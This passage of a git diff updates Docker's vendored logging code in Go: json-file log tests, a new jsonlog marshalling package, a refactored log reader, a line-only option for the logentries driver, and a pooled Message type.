{"log":"line2\n","stream":"src1","time":"0001-01-01T00:00:00Z"} {"log":"line3\n","stream":"src1","time":"0001-01-01T00:00:00Z"} @@ -137,10 +218,27 @@ func 
TestJSONFileLoggerWithOpts(t *testing.T) { {"log":"line14\n","stream":"src1","time":"0001-01-01T00:00:00Z"} {"log":"line15\n","stream":"src1","time":"0001-01-01T00:00:00Z"} ` - expected := `{"log":"line16\n","stream":"src1","time":"0001-01-01T00:00:00Z"} + expectedPenultimate := `{"log":"line16\n","stream":"src1","time":"0001-01-01T00:00:00Z"} {"log":"line17\n","stream":"src1","time":"0001-01-01T00:00:00Z"} {"log":"line18\n","stream":"src1","time":"0001-01-01T00:00:00Z"} {"log":"line19\n","stream":"src1","time":"0001-01-01T00:00:00Z"} +{"log":"line20\n","stream":"src1","time":"0001-01-01T00:00:00Z"} +{"log":"line21\n","stream":"src1","time":"0001-01-01T00:00:00Z"} +{"log":"line22\n","stream":"src1","time":"0001-01-01T00:00:00Z"} +{"log":"line23\n","stream":"src1","time":"0001-01-01T00:00:00Z"} +{"log":"line24\n","stream":"src1","time":"0001-01-01T00:00:00Z"} +{"log":"line25\n","stream":"src1","time":"0001-01-01T00:00:00Z"} +{"log":"line26\n","stream":"src1","time":"0001-01-01T00:00:00Z"} +{"log":"line27\n","stream":"src1","time":"0001-01-01T00:00:00Z"} +{"log":"line28\n","stream":"src1","time":"0001-01-01T00:00:00Z"} +{"log":"line29\n","stream":"src1","time":"0001-01-01T00:00:00Z"} +{"log":"line30\n","stream":"src1","time":"0001-01-01T00:00:00Z"} +{"log":"line31\n","stream":"src1","time":"0001-01-01T00:00:00Z"} +` + expected := `{"log":"line32\n","stream":"src1","time":"0001-01-01T00:00:00Z"} +{"log":"line33\n","stream":"src1","time":"0001-01-01T00:00:00Z"} +{"log":"line34\n","stream":"src1","time":"0001-01-01T00:00:00Z"} +{"log":"line35\n","stream":"src1","time":"0001-01-01T00:00:00Z"} ` if string(res) != expected { @@ -149,7 +247,9 @@ func TestJSONFileLoggerWithOpts(t *testing.T) { if string(penUlt) != expectedPenultimate { t.Fatalf("Wrong log content: %q, expected %q", penUlt, expectedPenultimate) } - + if string(antepenult) != expectedAntepenultimate { + t.Fatalf("Wrong log content: %q, expected %q", antepenult, expectedAntepenultimate) + } } func 
TestJSONFileLoggerWithLabelsEnv(t *testing.T) { @@ -160,13 +260,13 @@ func TestJSONFileLoggerWithLabelsEnv(t *testing.T) { } defer os.RemoveAll(tmp) filename := filepath.Join(tmp, "container.log") - config := map[string]string{"labels": "rack,dc", "env": "environ,debug,ssl"} - l, err := New(logger.Context{ + config := map[string]string{"labels": "rack,dc", "env": "environ,debug,ssl", "env-regex": "^dc"} + l, err := New(logger.Info{ ContainerID: cid, LogPath: filename, Config: config, ContainerLabels: map[string]string{"rack": "101", "dc": "lhr"}, - ContainerEnv: []string{"environ=production", "debug=false", "port=10001", "ssl=true"}, + ContainerEnv: []string{"environ=production", "debug=false", "port=10001", "ssl=true", "dc_region=west"}, }) if err != nil { t.Fatal(err) @@ -189,60 +289,14 @@ func TestJSONFileLoggerWithLabelsEnv(t *testing.T) { t.Fatal(err) } expected := map[string]string{ - "rack": "101", - "dc": "lhr", - "environ": "production", - "debug": "false", - "ssl": "true", + "rack": "101", + "dc": "lhr", + "environ": "production", + "debug": "false", + "ssl": "true", + "dc_region": "west", } if !reflect.DeepEqual(extra, expected) { t.Fatalf("Wrong log attrs: %q, expected %q", extra, expected) } } - -func BenchmarkJSONFileLoggerWithReader(b *testing.B) { - b.StopTimer() - b.ResetTimer() - cid := "a7317399f3f857173c6179d44823594f8294678dea9999662e5c625b5a1c7657" - dir, err := ioutil.TempDir("", "json-logger-bench") - if err != nil { - b.Fatal(err) - } - defer os.RemoveAll(dir) - - l, err := New(logger.Context{ - ContainerID: cid, - LogPath: filepath.Join(dir, "container.log"), - }) - if err != nil { - b.Fatal(err) - } - defer l.Close() - msg := &logger.Message{Line: []byte("line"), Source: "src1"} - jsonlog, err := (&jsonlog.JSONLog{Log: string(msg.Line) + "\n", Stream: msg.Source, Created: msg.Timestamp}).MarshalJSON() - if err != nil { - b.Fatal(err) - } - b.SetBytes(int64(len(jsonlog)+1) * 30) - - b.StartTimer() - - go func() { - for i := 0; i < b.N; i++ 
{ - for j := 0; j < 30; j++ { - l.Log(msg) - } - } - l.Close() - }() - - lw := l.(logger.LogReader).ReadLogs(logger.ReadConfig{Follow: true}) - watchClose := lw.WatchClose() - for { - select { - case <-lw.Msg: - case <-watchClose: - return - } - } -} diff --git a/vendor/github.com/docker/docker/daemon/logger/jsonfilelog/jsonlog/jsonlog.go b/vendor/github.com/docker/docker/daemon/logger/jsonfilelog/jsonlog/jsonlog.go new file mode 100644 index 0000000000..74be8e7da0 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/logger/jsonfilelog/jsonlog/jsonlog.go @@ -0,0 +1,25 @@ +package jsonlog // import "github.com/docker/docker/daemon/logger/jsonfilelog/jsonlog" + +import ( + "time" +) + +// JSONLog is a log message, typically a single entry from a given log stream. +type JSONLog struct { + // Log is the log message + Log string `json:"log,omitempty"` + // Stream is the log source + Stream string `json:"stream,omitempty"` + // Created is the created timestamp of log + Created time.Time `json:"time"` + // Attrs is the list of extra attributes provided by the user + Attrs map[string]string `json:"attrs,omitempty"` +} + +// Reset all fields to their zero value. 
+func (jl *JSONLog) Reset() { + jl.Log = "" + jl.Stream = "" + jl.Created = time.Time{} + jl.Attrs = make(map[string]string) +} diff --git a/vendor/github.com/docker/docker/pkg/jsonlog/jsonlogbytes.go b/vendor/github.com/docker/docker/daemon/logger/jsonfilelog/jsonlog/jsonlogbytes.go similarity index 76% rename from vendor/github.com/docker/docker/pkg/jsonlog/jsonlogbytes.go rename to vendor/github.com/docker/docker/daemon/logger/jsonfilelog/jsonlog/jsonlogbytes.go index df522c0d66..577c718f63 100644 --- a/vendor/github.com/docker/docker/pkg/jsonlog/jsonlogbytes.go +++ b/vendor/github.com/docker/docker/daemon/logger/jsonfilelog/jsonlog/jsonlogbytes.go @@ -1,25 +1,24 @@ -package jsonlog +package jsonlog // import "github.com/docker/docker/daemon/logger/jsonfilelog/jsonlog" import ( "bytes" "encoding/json" + "time" "unicode/utf8" ) -// JSONLogs is based on JSONLog. -// It allows marshalling JSONLog from Log as []byte -// and an already marshalled Created timestamp. +// JSONLogs marshals encoded JSONLog objects type JSONLogs struct { - Log []byte `json:"log,omitempty"` - Stream string `json:"stream,omitempty"` - Created string `json:"time"` + Log []byte `json:"log,omitempty"` + Stream string `json:"stream,omitempty"` + Created time.Time `json:"time"` // json-encoded bytes RawAttrs json.RawMessage `json:"attrs,omitempty"` } -// MarshalJSONBuf is based on the same method from JSONLog -// It has been modified to take into account the necessary changes. +// MarshalJSONBuf is an optimized JSON marshaller that avoids reflection +// and unnecessary allocation. 
func (mj *JSONLogs) MarshalJSONBuf(buf *bytes.Buffer) error { var first = true @@ -30,13 +29,13 @@ func (mj *JSONLogs) MarshalJSONBuf(buf *bytes.Buffer) error { ffjsonWriteJSONBytesAsString(buf, mj.Log) } if len(mj.Stream) != 0 { - if first == true { + if first { first = false } else { buf.WriteString(`,`) } buf.WriteString(`"stream":`) - ffjsonWriteJSONString(buf, mj.Stream) + ffjsonWriteJSONBytesAsString(buf, []byte(mj.Stream)) } if len(mj.RawAttrs) > 0 { if first { @@ -50,14 +49,18 @@ func (mj *JSONLogs) MarshalJSONBuf(buf *bytes.Buffer) error { if !first { buf.WriteString(`,`) } + + created, err := fastTimeMarshalJSON(mj.Created) + if err != nil { + return err + } + buf.WriteString(`"time":`) - buf.WriteString(mj.Created) + buf.WriteString(created) buf.WriteString(`}`) return nil } -// This is based on ffjsonWriteJSONBytesAsString. It has been changed -// to accept a string passed as a slice of bytes. func ffjsonWriteJSONBytesAsString(buf *bytes.Buffer, s []byte) { const hex = "0123456789abcdef" diff --git a/vendor/github.com/docker/docker/daemon/logger/jsonfilelog/jsonlog/jsonlogbytes_test.go b/vendor/github.com/docker/docker/daemon/logger/jsonfilelog/jsonlog/jsonlogbytes_test.go new file mode 100644 index 0000000000..d268db4df0 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/logger/jsonfilelog/jsonlog/jsonlogbytes_test.go @@ -0,0 +1,51 @@ +package jsonlog // import "github.com/docker/docker/daemon/logger/jsonfilelog/jsonlog" + +import ( + "bytes" + "encoding/json" + "fmt" + "regexp" + "testing" + "time" + + "gotest.tools/assert" +) + +func TestJSONLogsMarshalJSONBuf(t *testing.T) { + logs := map[*JSONLogs]string{ + {Log: []byte(`"A log line with \\"`)}: `^{\"log\":\"\\\"A log line with \\\\\\\\\\\"\",\"time\":`, + {Log: []byte("A log line")}: `^{\"log\":\"A log line\",\"time\":`, + {Log: []byte("A log line with \r")}: `^{\"log\":\"A log line with \\r\",\"time\":`, + {Log: []byte("A log line with & < >")}: `^{\"log\":\"A log line with \\u0026 
\\u003c \\u003e\",\"time\":`, + {Log: []byte("A log line with utf8 : 🚀 ψ ω β")}: `^{\"log\":\"A log line with utf8 : 🚀 ψ ω β\",\"time\":`, + {Stream: "stdout"}: `^{\"stream\":\"stdout\",\"time\":`, + {Stream: "stdout", Log: []byte("A log line")}: `^{\"log\":\"A log line\",\"stream\":\"stdout\",\"time\":`, + {Created: time.Date(2017, 9, 1, 1, 1, 1, 1, time.UTC)}: `^{\"time\":"2017-09-01T01:01:01.000000001Z"}$`, + + {}: `^{\"time\":"0001-01-01T00:00:00Z"}$`, + // These ones are a little weird + {Log: []byte("\u2028 \u2029")}: `^{\"log\":\"\\u2028 \\u2029\",\"time\":`, + {Log: []byte{0xaF}}: `^{\"log\":\"\\ufffd\",\"time\":`, + {Log: []byte{0x7F}}: `^{\"log\":\"\x7f\",\"time\":`, + // with raw attributes + {Log: []byte("A log line"), RawAttrs: []byte(`{"hello":"world","value":1234}`)}: `^{\"log\":\"A log line\",\"attrs\":{\"hello\":\"world\",\"value\":1234},\"time\":`, + // with Tag set + {Log: []byte("A log line with tag"), RawAttrs: []byte(`{"hello":"world","value":1234}`)}: `^{\"log\":\"A log line with tag\",\"attrs\":{\"hello\":\"world\",\"value\":1234},\"time\":`, + } + for jsonLog, expression := range logs { + var buf bytes.Buffer + err := jsonLog.MarshalJSONBuf(&buf) + assert.NilError(t, err) + + assert.Assert(t, regexP(buf.String(), expression)) + assert.NilError(t, json.Unmarshal(buf.Bytes(), &map[string]interface{}{})) + } +} + +func regexP(value string, pattern string) func() (bool, string) { + return func() (bool, string) { + re := regexp.MustCompile(pattern) + msg := fmt.Sprintf("%q did not match pattern %q", value, pattern) + return re.MatchString(value), msg + } +} diff --git a/vendor/github.com/docker/docker/daemon/logger/jsonfilelog/jsonlog/time_marshalling.go b/vendor/github.com/docker/docker/daemon/logger/jsonfilelog/jsonlog/time_marshalling.go new file mode 100644 index 0000000000..1822ea5dbc --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/logger/jsonfilelog/jsonlog/time_marshalling.go @@ -0,0 +1,20 @@ +package jsonlog // import 
"github.com/docker/docker/daemon/logger/jsonfilelog/jsonlog" + +import ( + "time" + + "github.com/pkg/errors" +) + +const jsonFormat = `"` + time.RFC3339Nano + `"` + +// fastTimeMarshalJSON avoids one of the extra allocations that +// time.MarshalJSON is making. +func fastTimeMarshalJSON(t time.Time) (string, error) { + if y := t.Year(); y < 0 || y >= 10000 { + // RFC 3339 is clear that years are 4 digits exactly. + // See golang.org/issue/4556#c15 for more discussion. + return "", errors.New("time.MarshalJSON: year outside of range [0,9999]") + } + return t.Format(jsonFormat), nil +} diff --git a/vendor/github.com/docker/docker/daemon/logger/jsonfilelog/jsonlog/time_marshalling_test.go b/vendor/github.com/docker/docker/daemon/logger/jsonfilelog/jsonlog/time_marshalling_test.go new file mode 100644 index 0000000000..b3959b0467 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/logger/jsonfilelog/jsonlog/time_marshalling_test.go @@ -0,0 +1,34 @@ +package jsonlog // import "github.com/docker/docker/daemon/logger/jsonfilelog/jsonlog" + +import ( + "testing" + "time" + + "gotest.tools/assert" + is "gotest.tools/assert/cmp" +) + +func TestFastTimeMarshalJSONWithInvalidYear(t *testing.T) { + aTime := time.Date(-1, 1, 1, 0, 0, 0, 0, time.Local) + _, err := fastTimeMarshalJSON(aTime) + assert.Check(t, is.ErrorContains(err, "year outside of range")) + + anotherTime := time.Date(10000, 1, 1, 0, 0, 0, 0, time.Local) + _, err = fastTimeMarshalJSON(anotherTime) + assert.Check(t, is.ErrorContains(err, "year outside of range")) +} + +func TestFastTimeMarshalJSON(t *testing.T) { + aTime := time.Date(2015, 5, 29, 11, 1, 2, 3, time.UTC) + json, err := fastTimeMarshalJSON(aTime) + assert.NilError(t, err) + assert.Check(t, is.Equal("\"2015-05-29T11:01:02.000000003Z\"", json)) + + location, err := time.LoadLocation("Europe/Paris") + assert.NilError(t, err) + + aTime = time.Date(2015, 5, 29, 11, 1, 2, 3, location) + json, err = fastTimeMarshalJSON(aTime) + assert.NilError(t, 
err) + assert.Check(t, is.Equal("\"2015-05-29T11:01:02.000000003+02:00\"", json)) +} diff --git a/vendor/github.com/docker/docker/daemon/logger/jsonfilelog/read.go b/vendor/github.com/docker/docker/daemon/logger/jsonfilelog/read.go index f2f9df1887..ab1793bb72 100644 --- a/vendor/github.com/docker/docker/daemon/logger/jsonfilelog/read.go +++ b/vendor/github.com/docker/docker/daemon/logger/jsonfilelog/read.go @@ -1,41 +1,16 @@ -package jsonfilelog +package jsonfilelog // import "github.com/docker/docker/daemon/logger/jsonfilelog" import ( - "bytes" "encoding/json" - "errors" - "fmt" "io" - "os" - "time" - "github.com/fsnotify/fsnotify" - "golang.org/x/net/context" - - "github.com/Sirupsen/logrus" + "github.com/docker/docker/api/types/backend" "github.com/docker/docker/daemon/logger" - "github.com/docker/docker/pkg/filenotify" - "github.com/docker/docker/pkg/ioutils" - "github.com/docker/docker/pkg/jsonlog" - "github.com/docker/docker/pkg/tailfile" + "github.com/docker/docker/daemon/logger/jsonfilelog/jsonlog" ) const maxJSONDecodeRetry = 20000 -func decodeLogLine(dec *json.Decoder, l *jsonlog.JSONLog) (*logger.Message, error) { - l.Reset() - if err := dec.Decode(l); err != nil { - return nil, err - } - msg := &logger.Message{ - Source: l.Stream, - Timestamp: l.Created, - Line: []byte(l.Log), - Attrs: l.Attrs, - } - return msg, nil -} - // ReadLogs implements the logger's LogReader interface for the logs // created by this driver. 
func (l *JSONFileLogger) ReadLogs(config logger.ReadConfig) *logger.LogWatcher { @@ -45,275 +20,70 @@ func (l *JSONFileLogger) ReadLogs(config logger.ReadConfig) *logger.LogWatcher { return logWatcher } -func (l *JSONFileLogger) readLogs(logWatcher *logger.LogWatcher, config logger.ReadConfig) { - defer close(logWatcher.Msg) +func (l *JSONFileLogger) readLogs(watcher *logger.LogWatcher, config logger.ReadConfig) { + defer close(watcher.Msg) - // lock so the read stream doesn't get corrupted due to rotations or other log data written while we read - // This will block writes!!! l.mu.Lock() - - pth := l.writer.LogPath() - var files []io.ReadSeeker - for i := l.writer.MaxFiles(); i > 1; i-- { - f, err := os.Open(fmt.Sprintf("%s.%d", pth, i-1)) - if err != nil { - if !os.IsNotExist(err) { - logWatcher.Err <- err - break - } - continue - } - defer f.Close() - - files = append(files, f) - } - - latestFile, err := os.Open(pth) - if err != nil { - logWatcher.Err <- err - l.mu.Unlock() - return - } - defer latestFile.Close() - - if config.Tail != 0 { - tailer := ioutils.MultiReadSeeker(append(files, latestFile)...) 
- tailFile(tailer, logWatcher, config.Tail, config.Since) - } - - // close all the rotated files - for _, f := range files { - if err := f.(io.Closer).Close(); err != nil { - logrus.WithField("logger", "json-file").Warnf("error closing tailed log file: %v", err) - } - } - - if !config.Follow { - if err := latestFile.Close(); err != nil { - logrus.Errorf("Error closing file: %v", err) - } - l.mu.Unlock() - return - } - - if config.Tail >= 0 { - latestFile.Seek(0, os.SEEK_END) - } - - l.readers[logWatcher] = struct{}{} + l.readers[watcher] = struct{}{} l.mu.Unlock() - notifyRotate := l.writer.NotifyRotate() - followLogs(latestFile, logWatcher, notifyRotate, config.Since) + l.writer.ReadLogs(config, watcher) l.mu.Lock() - delete(l.readers, logWatcher) + delete(l.readers, watcher) l.mu.Unlock() - - l.writer.NotifyRotateEvict(notifyRotate) } -func tailFile(f io.ReadSeeker, logWatcher *logger.LogWatcher, tail int, since time.Time) { - var rdr io.Reader - rdr = f - if tail > 0 { - ls, err := tailfile.TailFile(f, tail) - if err != nil { - logWatcher.Err <- err - return - } - rdr = bytes.NewBuffer(bytes.Join(ls, []byte("\n"))) - } - dec := json.NewDecoder(rdr) - l := &jsonlog.JSONLog{} - for { - msg, err := decodeLogLine(dec, l) - if err != nil { - if err != io.EOF { - logWatcher.Err <- err - } - return - } - if !since.IsZero() && msg.Timestamp.Before(since) { - continue - } - logWatcher.Msg <- msg - } -} - -func watchFile(name string) (filenotify.FileWatcher, error) { - fileWatcher, err := filenotify.New() - if err != nil { +func decodeLogLine(dec *json.Decoder, l *jsonlog.JSONLog) (*logger.Message, error) { + l.Reset() + if err := dec.Decode(l); err != nil { return nil, err } - if err := fileWatcher.Add(name); err != nil { - logrus.WithField("logger", "json-file").Warnf("falling back to file poller due to error: %v", err) - fileWatcher.Close() - fileWatcher = filenotify.NewPollingWatcher() - - if err := fileWatcher.Add(name); err != nil { - fileWatcher.Close() - 
logrus.Debugf("error watching log file for modifications: %v", err) - return nil, err + var attrs []backend.LogAttr + if len(l.Attrs) != 0 { + attrs = make([]backend.LogAttr, 0, len(l.Attrs)) + for k, v := range l.Attrs { + attrs = append(attrs, backend.LogAttr{Key: k, Value: v}) } } - return fileWatcher, nil + msg := &logger.Message{ + Source: l.Stream, + Timestamp: l.Created, + Line: []byte(l.Log), + Attrs: attrs, + } + return msg, nil } -func followLogs(f *os.File, logWatcher *logger.LogWatcher, notifyRotate chan interface{}, since time.Time) { - dec := json.NewDecoder(f) +// decodeFunc is used to create a decoder for the log file reader +func decodeFunc(rdr io.Reader) func() (*logger.Message, error) { l := &jsonlog.JSONLog{} - - name := f.Name() - fileWatcher, err := watchFile(name) - if err != nil { - logWatcher.Err <- err - return - } - defer func() { - f.Close() - fileWatcher.Remove(name) - fileWatcher.Close() - }() - - ctx, cancel := context.WithCancel(context.Background()) - defer cancel() - go func() { - select { - case <-logWatcher.WatchClose(): - fileWatcher.Remove(name) - cancel() - case <-ctx.Done(): - return - } - }() - - var retries int - handleRotate := func() error { - f.Close() - fileWatcher.Remove(name) - - // retry when the file doesn't exist - for retries := 0; retries <= 5; retries++ { - f, err = os.Open(name) - if err == nil || !os.IsNotExist(err) { + dec := json.NewDecoder(rdr) + return func() (msg *logger.Message, err error) { + for retries := 0; retries < maxJSONDecodeRetry; retries++ { + msg, err = decodeLogLine(dec, l) + if err == nil { break } - } - if err != nil { - return err - } - if err := fileWatcher.Add(name); err != nil { - return err - } - dec = json.NewDecoder(f) - return nil - } - errRetry := errors.New("retry") - errDone := errors.New("done") - waitRead := func() error { - select { - case e := <-fileWatcher.Events(): - switch e.Op { - case fsnotify.Write: - dec = json.NewDecoder(f) - return nil - case fsnotify.Rename, 
fsnotify.Remove: - select { - case <-notifyRotate: - case <-ctx.Done(): - return errDone - } - if err := handleRotate(); err != nil { - return err - } - return nil - } - return errRetry - case err := <-fileWatcher.Errors(): - logrus.Debug("logger got error watching file: %v", err) - // Something happened, let's try and stay alive and create a new watcher - if retries <= 5 { - fileWatcher.Close() - fileWatcher, err = watchFile(name) - if err != nil { - return err - } + // try again, could be due to a an incomplete json object as we read + if _, ok := err.(*json.SyntaxError); ok { + dec = json.NewDecoder(rdr) retries++ - return errRetry + continue } - return err - case <-ctx.Done(): - return errDone - } - } - handleDecodeErr := func(err error) error { - if err == io.EOF { - for err := waitRead(); err != nil; { - if err == errRetry { - // retry the waitRead - continue - } - return err - } - return nil - } - // try again because this shouldn't happen - if _, ok := err.(*json.SyntaxError); ok && retries <= maxJSONDecodeRetry { - dec = json.NewDecoder(f) - retries++ - return nil - } - // io.ErrUnexpectedEOF is returned from json.Decoder when there is - // remaining data in the parser's buffer while an io.EOF occurs. - // If the json logger writes a partial json log entry to the disk - // while at the same time the decoder tries to decode it, the race condition happens. 
- if err == io.ErrUnexpectedEOF && retries <= maxJSONDecodeRetry { - reader := io.MultiReader(dec.Buffered(), f) - dec = json.NewDecoder(reader) - retries++ - return nil - } - return err - } - - // main loop - for { - msg, err := decodeLogLine(dec, l) - if err != nil { - if err := handleDecodeErr(err); err != nil { - if err == errDone { - return - } - // we got an unrecoverable error, so return - logWatcher.Err <- err - return - } - // ready to try again - continue - } - - retries = 0 // reset retries since we've succeeded - if !since.IsZero() && msg.Timestamp.Before(since) { - continue - } - select { - case logWatcher.Msg <- msg: - case <-ctx.Done(): - logWatcher.Msg <- msg - for { - msg, err := decodeLogLine(dec, l) - if err != nil { - return - } - if !since.IsZero() && msg.Timestamp.Before(since) { - continue - } - logWatcher.Msg <- msg + // io.ErrUnexpectedEOF is returned from json.Decoder when there is + // remaining data in the parser's buffer while an io.EOF occurs. + // If the json logger writes a partial json log entry to the disk + // while at the same time the decoder tries to decode it, the race condition happens. 
+ if err == io.ErrUnexpectedEOF { + reader := io.MultiReader(dec.Buffered(), rdr) + dec = json.NewDecoder(reader) + retries++ } } + return msg, err } } diff --git a/vendor/github.com/docker/docker/daemon/logger/jsonfilelog/read_test.go b/vendor/github.com/docker/docker/daemon/logger/jsonfilelog/read_test.go new file mode 100644 index 0000000000..cad8003e5e --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/logger/jsonfilelog/read_test.go @@ -0,0 +1,64 @@ +package jsonfilelog // import "github.com/docker/docker/daemon/logger/jsonfilelog" + +import ( + "bytes" + "testing" + "time" + + "github.com/docker/docker/daemon/logger" + "gotest.tools/assert" + "gotest.tools/fs" +) + +func BenchmarkJSONFileLoggerReadLogs(b *testing.B) { + tmp := fs.NewDir(b, "bench-jsonfilelog") + defer tmp.Remove() + + jsonlogger, err := New(logger.Info{ + ContainerID: "a7317399f3f857173c6179d44823594f8294678dea9999662e5c625b5a1c7657", + LogPath: tmp.Join("container.log"), + Config: map[string]string{ + "labels": "first,second", + }, + ContainerLabels: map[string]string{ + "first": "label_value", + "second": "label_foo", + }, + }) + assert.NilError(b, err) + defer jsonlogger.Close() + + msg := &logger.Message{ + Line: []byte("Line that thinks that it is log line from docker\n"), + Source: "stderr", + Timestamp: time.Now().UTC(), + } + + buf := bytes.NewBuffer(nil) + assert.NilError(b, marshalMessage(msg, nil, buf)) + b.SetBytes(int64(buf.Len())) + + b.ResetTimer() + + chError := make(chan error, b.N+1) + go func() { + for i := 0; i < b.N; i++ { + chError <- jsonlogger.Log(msg) + } + chError <- jsonlogger.Close() + }() + + lw := jsonlogger.(*JSONFileLogger).ReadLogs(logger.ReadConfig{Follow: true}) + watchClose := lw.WatchClose() + for { + select { + case <-lw.Msg: + case <-watchClose: + return + case err := <-chError: + if err != nil { + b.Fatal(err) + } + } + } +} diff --git a/vendor/github.com/docker/docker/daemon/logger/logentries/logentries.go 
b/vendor/github.com/docker/docker/daemon/logger/logentries/logentries.go index e794b1ed08..70a8baf66e 100644 --- a/vendor/github.com/docker/docker/daemon/logger/logentries/logentries.go +++ b/vendor/github.com/docker/docker/daemon/logger/logentries/logentries.go @@ -1,13 +1,15 @@ // Package logentries provides the log driver for forwarding server logs // to logentries endpoints. -package logentries +package logentries // import "github.com/docker/docker/daemon/logger/logentries" import ( "fmt" + "strconv" - "github.com/Sirupsen/logrus" "github.com/bsphere/le_go" "github.com/docker/docker/daemon/logger" + "github.com/pkg/errors" + "github.com/sirupsen/logrus" ) type logentries struct { @@ -16,11 +18,13 @@ type logentries struct { containerName string writer *le_go.Logger extra map[string]string + lineOnly bool } const ( - name = "logentries" - token = "logentries-token" + name = "logentries" + token = "logentries-token" + lineonly = "line-only" ) func init() { @@ -35,33 +39,49 @@ func init() { // New creates a logentries logger using the configuration passed in on // the context. The supported context configuration variable is // logentries-token. -func New(ctx logger.Context) (logger.Logger, error) { - logrus.WithField("container", ctx.ContainerID). - WithField("token", ctx.Config[token]). +func New(info logger.Info) (logger.Logger, error) { + logrus.WithField("container", info.ContainerID). + WithField("token", info.Config[token]). + WithField("line-only", info.Config[lineonly]). 
Debug("logging driver logentries configured") - log, err := le_go.Connect(ctx.Config[token]) + log, err := le_go.Connect(info.Config[token]) if err != nil { - return nil, err + return nil, errors.Wrap(err, "error connecting to logentries") + } + var lineOnly bool + if info.Config[lineonly] != "" { + if lineOnly, err = strconv.ParseBool(info.Config[lineonly]); err != nil { + return nil, errors.Wrap(err, "error parsing lineonly option") + } } return &logentries{ - containerID: ctx.ContainerID, - containerName: ctx.ContainerName, + containerID: info.ContainerID, + containerName: info.ContainerName, writer: log, + lineOnly: lineOnly, }, nil } func (f *logentries) Log(msg *logger.Message) error { - data := map[string]string{ - "container_id": f.containerID, - "container_name": f.containerName, - "source": msg.Source, - "log": string(msg.Line), - } - for k, v := range f.extra { - data[k] = v + if !f.lineOnly { + data := map[string]string{ + "container_id": f.containerID, + "container_name": f.containerName, + "source": msg.Source, + "log": string(msg.Line), + } + for k, v := range f.extra { + data[k] = v + } + ts := msg.Timestamp + logger.PutMessage(msg) + f.writer.Println(f.tag, ts, data) + } else { + line := string(msg.Line) + logger.PutMessage(msg) + f.writer.Println(line) } - f.writer.Println(f.tag, msg.Timestamp, data) return nil } @@ -78,6 +98,7 @@ func ValidateLogOpt(cfg map[string]string) error { for key := range cfg { switch key { case "env": + case "env-regex": case "labels": case "tag": case key: diff --git a/vendor/github.com/docker/docker/daemon/logger/logger.go b/vendor/github.com/docker/docker/daemon/logger/logger.go index d091997358..912e855c7f 100644 --- a/vendor/github.com/docker/docker/daemon/logger/logger.go +++ b/vendor/github.com/docker/docker/daemon/logger/logger.go @@ -5,78 +5,70 @@ // factory, which holds the contextual instance information that // allows multiple loggers of the same type to perform different // actions, such as logging to 
different locations. -package logger +package logger // import "github.com/docker/docker/daemon/logger" import ( - "errors" - "sort" - "strings" "sync" "time" - "github.com/docker/docker/pkg/jsonlog" + "github.com/docker/docker/api/types/backend" ) -// ErrReadLogsNotSupported is returned when the logger does not support reading logs. -var ErrReadLogsNotSupported = errors.New("configured logging reader does not support reading") +// ErrReadLogsNotSupported is returned when the underlying log driver does not support reading +type ErrReadLogsNotSupported struct{} + +func (ErrReadLogsNotSupported) Error() string { + return "configured logging driver does not support reading" +} + +// NotImplemented makes this error implement the `NotImplemented` interface from api/errdefs +func (ErrReadLogsNotSupported) NotImplemented() {} const ( - // TimeFormat is the time format used for timestamps sent to log readers. - TimeFormat = jsonlog.RFC3339NanoFixed logWatcherBufferSize = 4096 ) -// Message is datastructure that represents piece of output produced by some -// container. The Line member is a slice of an array whose contents can be -// changed after a log driver's Log() method returns. -type Message struct { - Line []byte - Source string - Timestamp time.Time - Attrs LogAttributes - Partial bool -} +var messagePool = &sync.Pool{New: func() interface{} { return &Message{Line: make([]byte, 0, 256)} }} -// CopyMessage creates a copy of the passed-in Message which will remain -// unchanged if the original is changed. Log drivers which buffer Messages -// rather than dispatching them during their Log() method should use this -// function to obtain a Message whose Line member's contents won't change. 
-func CopyMessage(msg *Message) *Message { - m := new(Message) - m.Line = make([]byte, len(msg.Line)) - copy(m.Line, msg.Line) - m.Source = msg.Source - m.Timestamp = msg.Timestamp - m.Partial = msg.Partial - m.Attrs = make(LogAttributes) - for k, v := range msg.Attrs { - m.Attrs[k] = v - } - return m +// NewMessage returns a new message from the message sync.Pool +func NewMessage() *Message { + return messagePool.Get().(*Message) } -// LogAttributes is used to hold the extra attributes available in the log message -// Primarily used for converting the map type to string and sorting. -type LogAttributes map[string]string -type byKey []string - -func (s byKey) Len() int { return len(s) } -func (s byKey) Less(i, j int) bool { - keyI := strings.Split(s[i], "=") - keyJ := strings.Split(s[j], "=") - return keyI[0] < keyJ[0] +// PutMessage puts the specified message back n the message pool. +// The message fields are reset before putting into the pool. +func PutMessage(msg *Message) { + msg.reset() + messagePool.Put(msg) } -func (s byKey) Swap(i, j int) { - s[i], s[j] = s[j], s[i] + +// Message is data structure that represents piece of output produced by some +// container. The Line member is a slice of an array whose contents can be +// changed after a log driver's Log() method returns. +// +// Message is subtyped from backend.LogMessage because there is a lot of +// internal complexity around the Message type that should not be exposed +// to any package not explicitly importing the logger type. +// +// Any changes made to this struct must also be updated in the `reset` function +type Message backend.LogMessage + +// reset sets the message back to default values +// This is used when putting a message back into the message pool. +// Any changes to the `Message` struct should be reflected here. 
+func (m *Message) reset() { + m.Line = m.Line[:0] + m.Source = "" + m.Attrs = nil + m.PLogMetaData = nil + + m.Err = nil } -func (a LogAttributes) String() string { - var ss byKey - for k, v := range a { - ss = append(ss, k+"="+v) - } - sort.Sort(ss) - return strings.Join(ss, ",") +// AsLogMessage returns a pointer to the message as a pointer to +// backend.LogMessage, which is an identical type with a different purpose +func (m *Message) AsLogMessage() *backend.LogMessage { + return (*backend.LogMessage)(m) } // Logger is the interface for docker logging drivers. @@ -86,9 +78,17 @@ type Logger interface { Close() error } +// SizedLogger is the interface for logging drivers that can control +// the size of buffer used for their messages. +type SizedLogger interface { + Logger + BufSize() int +} + // ReadConfig is the configuration passed into ReadLogs. type ReadConfig struct { Since time.Time + Until time.Time Tail int Follow bool } @@ -132,3 +132,14 @@ func (w *LogWatcher) Close() { func (w *LogWatcher) WatchClose() <-chan struct{} { return w.closeNotifier } + +// Capability defines the list of capabilities that a driver can implement +// These capabilities are not required to be a logging driver, however do +// determine how a logging driver can be used +type Capability struct { + // Determines if a log driver can read back logs + ReadLogs bool +} + +// MarshalFunc is a func that marshals a message into an arbitrary format +type 